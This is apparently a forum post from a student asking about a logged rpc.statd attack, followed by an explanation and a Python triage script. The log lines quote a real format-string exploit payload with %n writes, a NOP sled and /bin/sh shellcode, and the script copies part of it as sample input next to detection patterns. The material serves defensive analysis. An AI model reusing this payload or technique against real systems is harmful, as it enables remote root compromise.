I decided to review my own logs (I know I should do it more
often).
Apparently, my web server has been attacked repeatedly and, if the IP is true (if I am reading it right; maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC. Here is the log:

Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff

Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192". Does that mean 236.137.10.192?
Now popping that IP into the whois at arin.net yielded this:

University of Southern California (NET-MCAST-NET)
   Information Sciences Institute
   4676 Admiralty Way
   Marina Del Rey, CA 90292-6695
   US

   Netname: MCAST-NET
   Netblock: 224.0.0.0 - 239.255.255.255

   Coordinator:
      Internet Corporation for Assigned Names and Numbers (IANA-ARIN)  [EMAIL PROTECTED]
      (310) 823-9358

   Domain System inverse mapping provided by:

   FLAG.EP.NET      198.32.4.13
   STRUL.STUPI.SE   192.108.200.1 192.36.143.3
   NS.ISI.EDU       128.9.128.127
   NIC.NEAR.NET     192.52.71.4

   Record last updated on 12-Sep-2000.
   Database last updated on 20-Apr-2001 00:14:29 EDT.

Could it be a spoofed address? A compromised machine doing the scanning? Some script kiddy kid sitting in his dorm room? What is my course of action now?

My main page hasn't been defaced with pictures of someone's grandma in compromising poses, so I guess that is a good first sign the attack didn't work? Or did it work and my machine has been compromised and is now being used for DDoS or a w4r3z britney spears mp3 porn server?
I will notify the sysadmin of my school district (I'm a student) of this of
course.
If that IP is true, should I be contacting a USC sysadmin? I would feel especially responsible if it was some poor sysadmin's compromised machine at another school.

- Kath, the perpetually worried
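The log line quoted above is a classic format-string attack against rpc.statd: the hostname handed to gethostbyname() is later passed to a printf-style call, so the attacker supplies `%n` directives (which write to memory) and numeric field widths such as `%236x`. Those widths are padding counts that control what `%n` writes, not the octets of an address, and the ARIN record in the post already shows why the "IP" cannot be the sender: 224.0.0.0 - 239.255.255.255 (MCAST-NET) is the multicast range, which is never a unicast source. The following triage script is an added example for this thread, not code from the post or from the techtalk list; it parses syslog lines of this shape, reports the indicators a defender would look for (`%n` count, the widths preceding each `%n`, a run of `\220` bytes as syslog prints 0x90 in octal, and an embedded `/bin` ... `/sh` string), and classifies any dotted quad read out of the widths with Python's `ipaddress` module. The sample lines are constructed: an abbreviated copy of the quoted line and one benign rpc.statd message for contrast.

```python
"""Triage of rpc.statd "gethostbyname error" lines for format-string
exploit attempts. Added example for this thread, not code from the post.

Per syslog line it reports:
  * %n directives: a printf "write count to pointer" directive has no
    business inside a hostname, so even one is a strong indicator;
  * the widths in "%236x%n%137x%n...": padding counts that set the values
    written by %n, not the octets of an IP address;
  * a run of "\\220": syslog prints byte 0x90 (x86 NOP) in octal, so a
    long run is a NOP sled;
  * "/bin" ... "/sh" inside the payload: an embedded shell path.
It also classifies the dotted quad the post read out of the widths, which
falls in 224.0.0.0/4 (multicast) and so could not have been the sender.
"""
import ipaddress
import re

SYSLOG_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>\S+?)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
PERCENT_N = re.compile(r"%n")
WIDTH_BEFORE_N = re.compile(r"%(\d+)[xXdu]%n")  # e.g. %236x%n -> 236
OCTAL_NOP_SLED = re.compile(r"(?:\\220){16,}")  # 16+ consecutive 0x90 bytes
SHELL_PATH = re.compile(r"/bin.{0,8}/sh")

# Constructed sample input: an abbreviated copy of the line quoted in the
# post (sled shortened to 48 bytes, payload cut after "/sh") and one
# benign rpc.statd message for contrast.
SAMPLE_LOG = [
    "Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for "
    + r"^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf"
    + "%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
    + r"\220" * 48
    + r"\xc7^F/bin\xc7F^D/sh",
    "Apr 18 15:26:01 hwnet /sbin/rpc.statd[177]: gethostbyname error for "
    "host.example.invalid",
]


def parse_syslog(line):
    """Split a classic syslog line into timestamp, host, program, pid, message."""
    m = SYSLOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    return rec


def analyze(line):
    """Return the parsed record plus format-string indicators, or None."""
    rec = parse_syslog(line)
    if rec is None:
        return None
    msg = rec["msg"]
    rec["n_writes"] = len(PERCENT_N.findall(msg))
    rec["write_widths"] = [int(w) for w in WIDTH_BEFORE_N.findall(msg)]
    rec["nop_sled"] = OCTAL_NOP_SLED.search(msg) is not None
    rec["shell_path"] = SHELL_PATH.search(msg) is not None
    # A %n in a hostname is sufficient on its own; the other indicators
    # corroborate and help tell a bare probe from a full payload.
    rec["suspicious"] = rec["n_writes"] > 0 or rec["nop_sled"] or rec["shell_path"]
    return rec


def classify_dotted_quad(widths):
    """Read four numbers as an IPv4 address (what the post did to get
    236.137.10.192) and say what kind of address that would be."""
    if len(widths) != 4 or any(not 0 <= w <= 255 for w in widths):
        return None, "not four octet-sized numbers"
    ip = ipaddress.IPv4Address(".".join(str(w) for w in widths))
    if ip.is_multicast:
        kind = "multicast"  # 224.0.0.0/4: never a valid source address
    elif ip.is_private or ip.is_loopback:
        kind = "private"
    elif ip.is_global:
        kind = "global"
    else:
        kind = "reserved"
    return str(ip), kind


def triage(lines):
    """Return only the suspicious records from an iterable of syslog lines."""
    return [r for r in (analyze(l) for l in lines) if r and r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        ip, kind = classify_dotted_quad(hit["write_widths"])
        print(f"{hit['ts']} {hit['host']} {hit['prog']}[{hit['pid']}]: "
              f"%n x{hit['n_writes']}, widths={hit['write_widths']}, "
              f"sled={hit['nop_sled']}, shell={hit['shell_path']}, "
              f"widths-as-IP={ip} ({kind})")
```

Run it over a real file with `triage(open("/var/log/messages"))`; the sender's address is not in this log line at all, so the next step for the original question is correlating the timestamp with the rpc.statd / portmap connection records (or firewall logs) from the same minute rather than whois on the payload. Whether the attempt succeeded is not visible from the syslog entry either: a successful exploit leaves the same line behind, so the host itself has to be checked.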